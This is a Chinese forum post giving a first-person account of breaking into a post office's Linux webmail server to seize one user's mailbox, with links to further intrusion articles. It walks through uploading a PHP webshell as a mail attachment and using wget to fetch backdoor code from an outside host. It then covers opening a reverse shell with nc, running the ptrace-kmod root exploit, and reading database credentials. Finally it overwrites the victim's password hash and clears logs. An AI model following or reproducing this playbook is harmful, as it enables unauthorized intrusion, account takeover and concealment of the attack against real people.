一次渗透入侵某邮局过程(LINUX8.0)

所属分类: 网络安全 / 黑客入侵 阅读数: 99
收藏 0 赞 0 分享
自从我承担起一个项目的负责人后,原本没有规律的生活现在更变的没有头绪了........时间的因素决定了自己无法去做一些想做的事情。但是有些时候又不得不去做一些不想做的事情。。。。。。
得到一个MAIL信箱地址,我想拿到这个信箱的密码。至于什么原因促使我必须要拿到此信箱的密码我在这里就保密。。。。。
要得到一个信箱的密码?暴力破解?枚举探测?NO!
一听暴力、枚举,我心都麻。。。。我害怕暴力、更害怕枚举:)
首先打开此信箱的登陆地址 http://mail.xxx.com.cn
简单了看了一下也没发现什么漏洞,在打开其主页http://www.xxx.com.cn
看看全都是一些HTML页面,连ASP都没有,心想这下不好办了,ASP代码漏洞,数据库插入漏洞统统派不上用场,好不容易有个论坛栏目还是空地,估计还没开。按惯例吧,看看是什么系统,心想应该是LINUX的吧,一般像邮局这些单位都比较喜欢用这类系统
ping www.xxx.com.cn
Pinging www.xxx.com.cn [61.xxx.xxx.xxx] with 32 bytes of data:
Reply from 61.xxx.xxx.xxx: bytes=32 time

501 Method
Not Implemented

Method Not Implemented

 to /index.html not supported.

Invalid method in request 



Apache/1.3.12 Server at www.xxx.com.cn Port 80

Connection to host lost.
看到了我想了解到的信息 Apache/1.3.12 ,WEB是用APACHE架设的,从PING值以及80返回的信息来看,判断对方的主机应该是linux系统。(此以上判断方法只是做为常用的判断手法,但不包含所有的服务器都可以用此方法判断出正确的xx作系统,有些管理员没事干的时候可以改改PING值,改改WEB返回的版本信息,那么你得到的将会是一个错误的信息了)
从WEB的整个站点来看没有什么可利用的东西,只开了80、25、110端口,没开远程TELNET管理,说不定还有_blank">防火墙。估计远程溢出等等程序都没有利用的余地了。没办法只好在回到mail.xxx.com.cn上看看,看着信箱登陆页面发呆着。。。。输入信箱用户名xxx密码:假密码(如果这时候要是碰巧输入的密码是对的那会如何?)
希望可以返回一些有用的错误信息,可见也很小气,只返回了,密码或者用户名错误,什么都没了。。。无语。。。。。。
眼睛一亮,上面这么大的图片写着免费注册,为什么不注册一个进去看看呢?正高兴的去点,怎么也点不开,还以为鼠标坏了呢。原来管理员把注册的连接地址去掉了,不允许注册。这是过分。。。
打开此页面仔细查看原代码,希望可以找到我需要的信息:(











用户名:



口 令:
 
 忘记密码-->



IP安全
-->

看到了mail/login.php、getpw.html与cert/index.html
第一个是验证登陆页面login.php,请求后没找到可利用漏洞,getpw.htm?难道是找回密码的页面?可惜请求此页面提示找不到该页,我想是管理员删除了吧。在接着请求cert/index.html 老天!真好,竟然是注册新用户的页面。(PS:我在想为何管理员删除了getpwd.htm为何留下了这个申请页面?难道是为了方便自己开新用户?那他用ADMIN帐号直接开用户不是更好?不解中。。。)
填好相关信息我注册了一个帐号为 test密码为test,登陆进去了高兴。。。。。。别人是不是在想就注册一个普通的信箱用户也高兴。。。。。:(
我的思路是上传一个webshell上去,然后就好办了。但是怎么上传上去呢,这个是个问题。注意有了,看到他是支持PHP的,那么APACHE的目录应该是不支持ASP的,找了个PHP的WEBSHELL。接着,邮件,发给谁?当然是发给自己了 上传wehbshell.php然后OK点发送,就自己给自己发了一封信,附件里载着我的希望。。。webshell.php,现在的思路是如何知道webshell.php的真实访问地址,凭着入侵积累的经验,不停止的对附件构造伪造的请求,终于返回了我需要的错误信息,判断一下便的到了真实的地址为
http://mail.xxx.com.cn/file/webshell.php
好了,得到一个SHELL了
uname 得到确实是linux的系统
ls -l
看一下文件
现在只是一个WEBSHELL环境,xx作起来及不舒服,还是先得到一个CMD下的SHELL好,找出一个LINUX的反向连接程序,这样用NC将会得到一个本地SHELL,那么LINUX来说本地溢出提升到ROOT权限不是更容易了。开始。。。
wget http://xxx.com/bd.c -O /tmp/door.c
把db.c传到TMP下改名为 door.c
注:只有对TMP目录里才有写的权限
gcc -o /tmp/door /tmp/door.c
把door.c编译
接着在PHP的SHELL里在输入
/tmp/door 211.xx.xxxx.xxx
要反弹连接到的机器IP(211.xxx.xxx.xxx为我的机器IP)
然后我在本机上开
nc -l -vv -p 4000
接着一会便出现了反弹成功的信息
uid 看了一下
接着提升权限到root
wget http://xxxx.xxx.xxxx/ptrace-kmod.c
下载到机器上
gcc -o ptrace-kmod ptrace-kmod.c
编译ptrace-kmod.c
运行ptrace-kmod
溢出成功,拿到了ROOT权限
ls -l
看到确定WEBMAIL的目录位置
然后进入到WEBMAIL的目录里ls -l
看到config.php文件
接着cat config.php
得到MYSQL的用户名为:root 密码为xxx
MAIL的数据库为webmail
好了,本地进行登陆MYSQL
mysql -u root -p
输入密码后进入了mysql
查看我需要的信箱用户xxx
select * from webmail where pw_name=’xxx’;
返回
----------------------------------------------------------------
pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir
pw_shell
xxx mail.xxx.com.cn ftczP2YoArY7o 0 0 xxx /home/vp
opmail/domains/mail.xxx.com.cn/D/xxx 10485760
-------------------------------------------------------------------
看到了,我要的用户xxx的密码是 ftczP2YoArY7o,很明显是加密过的,既然加密过的,我就改他密码,然后进他的邮箱
select * from webmail where pw_name=’test’;
看我自己刚才注册的用户名信息
----------------------------------------------------------------
pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir
pw_shell
test mail.xxx.com.cn ft6GFs8hTv26 0 0 test /home/vp
opmail/domains/mail.xxx.com.cn/D/xxx 10485760
-------------------------------------------------------------------
好了,看到我注册的test密码是ft6GFs8hTv26
update webmail;
update webmail set pw_passwd=’ft6GFs8hTv26 ’ where pw_name=’xxx’;
把用户名为xxx的密码改为test
顺便我也改了他的ADMIN和WEBMASTER的进去看一下,得到他的MAIL真的是没有管理员,难怪管理员没把那个申请的页面删除,还真是为了给自己用起来方便,呵呵。看完我所需要的信息后,在把他们的密码恢复。然后清除了日志,OK,此次入侵测试成功完成
对方的主机系统为linux 8.0的
上面用到的溢出代码,我都放在下再站的LINUX/exploits目录里,有需要的朋友可以自己去下。
更多精彩内容其他人还在看

黑客技术讲解 网吧入侵方法大搜罗

首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体
收藏 0 赞 0 分享

通过Asp入侵Webserver

通过asp入侵web server,窃取文件毁坏系统,这决非耸人听闻... iis的安全性问题 1.iis3/pws的漏洞 我实验过,win98 pws上运行ASP程序,只须在浏览器地址栏内多加一个小数点ASP程序就会被下载下来。IIS3听说也有同样的问题,
收藏 0 赞 0 分享

详尽的IPC$入侵

一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步
收藏 0 赞 0 分享

如何入侵ADSL

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范! 口述: 也许看烂了网上已有的
收藏 0 赞 0 分享

看我来入侵复旦大学(图)

一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。 二、战略部署 这次要拿的
收藏 0 赞 0 分享

领土之争——入侵某视讯服务器回忆录

老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。 1.石榴裙下的kk 说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终
收藏 0 赞 0 分享

黑客攻防实战之对有防火墙网站入侵过程

前几天群里的兄弟给了一个网站,问我可不可以入侵。   一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp
收藏 0 赞 0 分享

看看黑客都在偷窥什么!入侵个人电脑揭密(图)

前几天看《南国早报》说一位女孩个人电脑被黑客入侵控制,把裸照发到网上威胁女孩的事。联想到最近网上这样的事挺多的,就想给大家说说怎么防范。 其实现在的网络真的不安全~只要你的电脑连接上网络就存在一定的风险。黑客并不是万能的,他们入侵的电脑都是存在比较严重
收藏 0 赞 0 分享

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享
查看更多